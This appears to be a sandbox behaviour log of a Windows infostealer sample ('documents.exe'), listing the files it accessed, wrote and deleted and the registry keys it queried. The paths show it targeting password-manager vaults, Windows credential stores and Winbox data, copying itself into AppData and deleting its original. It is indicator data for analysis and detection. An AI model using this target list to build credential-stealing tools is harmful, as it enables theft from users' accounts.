C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\Seven01\Documents
C:\Users\Seven01\Documents\*.kdbx
C:\Users\Seven01\Desktop
C:\Users\Seven01\Desktop\*.kdbx
C:\Users\Seven01\Documents\*.kdb
C:\Users\Seven01\Desktop\*.kdb
C:\Users\Seven01\Documents\Enpass
C:\Users\Seven01\Documents\My RoboForm Data
C:\Users\Seven01\Documents\1Password
C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\Seven01\AppData\Local\Temp\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\Seven01\AppData\Local\Temp\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\Seven01\AppData\Local\Temp\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Local\Microsoft\Credentials
C:\Users\Seven01\AppData\Local\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\documents.exe.config
C:\Users\Seven01\AppData\Local\Temp\documents.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol28.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\fbc05b5b05dc6366b02b8e2f77d080f1\System.Core.ni.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50

Write Files

C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe

Delete Files

C:\Users\Seven01\AppData\Local\Temp\documents.exe:Zone.Identifier
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2688.7335343
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2688.7335343
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2688.7335500
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Local\Temp\documents.exe

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\documents.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\43074441\377c1cd0
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
